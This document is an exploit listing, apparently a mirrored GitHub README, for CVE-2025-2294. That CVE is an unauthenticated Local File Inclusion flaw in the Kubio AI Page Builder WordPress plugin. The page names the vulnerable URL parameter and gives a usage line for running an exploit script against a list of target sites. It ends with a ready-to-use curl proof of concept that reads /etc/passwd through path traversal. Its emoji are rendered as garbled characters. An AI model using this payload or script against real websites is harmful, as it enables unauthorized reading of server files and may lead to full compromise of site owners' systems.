## https://sploitus.com/exploit?id=AA736359-13D6-55ED-A93F-614414FF50B6
# CVE-2025-2294
# π¨ CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress π§±
## π Overview
**CVE-2025-2294** is a critical π₯ Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows **unauthenticated remote attackers** πΎ to include arbitrary files on the server via the `__kubio-site-edit-iframe-classic-template` URL parameter.
Exploiting this vulnerability may lead to disclosure of sensitive files π, remote code execution π₯, and full system compromise π.
## π€ Author
**Muhammad Nizar** β Security Researcher π
GitHub: [0xWhoami35](https://github.com/0xWhoami35)
YouTube: [InfoSec Insight](https://www.youtube.com/channel/UC33gQFGBqkqDE0zZNwamCgw) βΆοΈ
---
*Feel free to reach out for questions or collaboration! π€*
---
## π Affected Versions
- Kubio AI Page Builder plugin β€ 2.5.1 π οΈ
---
## π§° Usage
Run the exploit script with a list of target URLs:
```bash
python3 lfi.py -l list.txt
```
## β οΈ Vulnerability Details
- **Type:** Local File Inclusion (LFI) π³οΈ
- **Severity:** Critical (CVSS 9.8) π₯
- **Attack Vector:** Remote, unauthenticated π
- **Impact:** Confidentiality, Integrity, Availability π
---
## π§ͺ Proof of Concept (PoC)
```bash
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"